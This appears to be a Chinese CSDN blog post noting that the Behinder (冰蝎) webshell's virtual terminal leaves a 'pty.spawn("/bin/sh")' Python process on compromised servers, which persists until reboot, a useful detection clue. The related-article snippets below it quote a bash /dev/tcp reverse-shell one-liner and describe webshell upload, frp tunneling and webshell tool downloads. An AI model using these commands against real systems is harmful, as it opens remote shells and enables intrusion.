冰蝎连接后在目标服务器遗留的Python进程研究

最新推荐文章于 2024-04-18 21:20:28 发布
最新推荐文章于 2024-04-18 21:20:28 发布
阅读量381 收藏
点赞数
分类专栏: 实践笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lynnez_dd/article/details/114274074
版权

经验证,冰蝎2.0和冰蝎3.0在连马后,会在被攻击目标服务器上遗留以下Python进程:

python -c import pty; pty.spawn("/bin/sh")

经调试验证,发现该Python进程是由于攻击者连马后,在冰蝎客户端中启动“虚拟终端”(即交互式终端tty)后生成的Python进程,每启动一次虚拟终端都会在目标机服务器中生成一个Python进程。

python -c import pty; pty.spawn("/bin/sh")

 

而且,即使在删除冰蝎马之后该进程仍然存在,只有在重启目标服务器后该Python进程才会消失。

樱桃小丸丸纸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【靶场】双重内网渗透测试场景_利用冰蝎搭建隧道,网络安全面试知识点
imtokenmax众筹
04-06 643
查看扫描结果:发现tomcat 的ip为192.168.20.1:8080这里使用冰蝎简单代理给他代理出来:成功代理到本地的8080端口:注意这种方式不稳定不怕麻烦使用frp代理上传webshell:这里是tomcat弱密码漏洞上传jsp木:直接用冰蝎连接:查看网卡:网卡中有30网段:测试是否出网目标可以出网进行反弹shell(因为这里的冰蝎隧道不稳定):这里使用nc做监听:bash -i >& /dev/tcp/公网ip/端口 0>&1。
冰蝎v2.0.1.zip
05-19
冰蝎webshell连接工具,无毒无后门,可放心使用
【靶场】双重内网渗透测试场景_利用冰蝎搭建隧道,2024年最新手把手教你5G时代Webview的正确使用姿势
最新发布
2401_84253850的博客
04-18 879
bash -i >& /dev/tcp/公网ip/端口 0>&1。发现tomcat 的ip为192.168.20.1:8080。上传webshell:这里是tomcat弱密码漏洞。注意这种方式不稳定不怕麻烦使用frp代理。执行./frpc -c frpc.ini。网卡中有30网段:测试是否出网。
webshell连接工具冰蝎2.0,后面有三点零的,找一找再发
12-28
做渗透的,不支持恶意攻击
openssl 版本区别_冰蝎的前世今生:3.0新版本下的一些防护思考
weixin_39641103的博客
11-27 903
冰蝎(Behinder)是国内黑客圈较火的一款Webshell管理工具。在今年HW开始前,冰蝎突然进行了3.0版本的发布,新版本修改了不少旧版本的流量特征,导致大量WAF、HIDS、Webshell检测工具失效。本文将详细揭秘冰蝎的前世今生,以及对于冰蝎相关攻击的检测思路和3.0新版本下的防护思考。冰蝎的前世在冰蝎这个工具出现以前,中国菜刀一直是国内的白帽子、黑帽子、各种帽子常用的Webshell...
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
lza20001103的博客
08-13 4694
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
冰蝎 连接到反弹shell拿到权限全过程
热门推荐
hackzkaq的博客
11-25 1万+
一.冰蝎简介 什么是冰蝎冰蝎”是一个动态二进制加密网站管理客户端。 在实战中一代webshell管理工具“菜刀”的流量特征非常明显,很容易就被安全设备检测到。 基于流量加密的webshell变得越来越多,“冰蝎”在此应运而生。 一.冰蝎连接getshell方法 1.加入冰蝎特有的的PHP木,(注意:使用一句话木无法连接冰蝎),连接密码可以随意改动格式为md5 32为的前16为值 md5(admin)[0-16] <?php @errorreporting(0); session_start()
python遗留物检测遗失物品检测预警
01-08
python遗留物检测遗失物品检测预警
python遗留物检测项目源码和测试视频数据都有
12-07
python遗留物检测项目源码和测试视频数据都有
pysmss:简化的错误创建的服务器设置-Python重写
03-07
简化的错误创建的服务器设置-Python版这是对遗留的“简化的错误创建的服务器设置”脚本的完整重写。 该脚本尚未自动更新,目前也不会提示输入服务器值。 而是,可以在配置文件中填充所有所需的可配置值。 如果未指定...
目标检测_Opencv视频处理遗留物检测 智能视频分析项目中的一部分_遗留物检测_智能视频分析_VC++
04-28
目标检测_Opencv视频处理遗留物检测 智能视频分析项目中的一部分_遗留物检测_智能视频分析_VC++
PHP灵魂一句话3.0内部版
11-13
PHP灵魂一句话3.0内部版
冰蝎v3.0-beta7
08-31
冰蝎3.0
哈尔乌素露天煤矿安全度过遗留斜井技术研究
05-13
哈尔乌素露天煤矿属国家特大型露天煤矿,设计年产3 100万t,剥采工程量大...这几项技术研究是为该矿紧张的生产任务提供有用的技术参考,如能顺利实施可保证设备人员安全作业、生产效率有所提高,为煤炭安全高效生产做贡献。
网络安全工具冰蝎(behinder)3.0使用教程
SHELLCODE_8BIT的博客
09-13 3189
输入我们上传的地址,之后密码填写rebeyond。我的是java所以选择shell.jsp。将server中的文件上传。
冰蝎3.0(Behinder.jar)无法打开
m0_53623841的博客
02-12 458
可能是冰蝎beta7版本客户端不再内置javafx库,java11以后版本移除了JavaFX库,要运行冰蝎需要自己下载JavaFX库。在冰蝎中新建一个start.txt,写入下面的代码,双引号中写入自己刚刚下载的lib文件夹的路径。时光从来都不会为任何一个人停留脚步,我们要珍惜这短暂而美好的时光。应该是缺了javafx,直接下载就行。双击start.bat,即可打开冰蝎。保存,并且将后缀bat。
python3 -c ‘import pty;pty.spawn(“/bin/bash“)‘升级切换交互式shell
sweelg的博客
02-28 3655
python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty -a stty raw -echo;fg reset stty rows 29 columns 94 row和columns数据为stty -a后的数据
网站控制工具:冰蝎3.0使用体验
jklbnm12的博客
04-25 3410
这篇文章比较基础,主要面向新手,技术含量较低主要为操作流程。 0x01. 冰蝎是什么 利用动态二进制加密实现新型一句话木的客户端 , 相对于菜刀和蚁剑他的数据是加密传输的 1.1 下载 github地址: https://github.com/rebeyond/Behinder/releases 下载后的文件 server文件中放的是各种语言的webshell,如下图: Behinder_v3.0_Beta6_win.jar是客户端 , 双击就能打开 , 但是要有java环境 , 下图是我的ja
【靶场】双重内网渗透测试场景
信安是不可或缺的一部分!
05-31 1520
使用vulfocus搭建一个内网场景靶场拓扑如下:入口有两个,一个是think PHP2.x命令执行和5x的命令执行漏洞,后续需要搭建二层隧道进行渗透测试。这个场景还是比较简单,如果目标不出网,也可以在tomcat上做frpserver服务,让他又当客户机又当服务器,同时还可通过msf做代理和上线cs做权限维持,下次使用这种方式做测试,试试效果如何。
python遗留物检测项目
12-05
Python遗留物检测项目的目标是及时发现和解决这些问题,使代码保持高质量和可维护性。该项目可以通过静态代码分析工具、代码审查和自动化测试等方式来实现。 具体来说,该项目可以包括以下方面的内容: 1. 检测...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值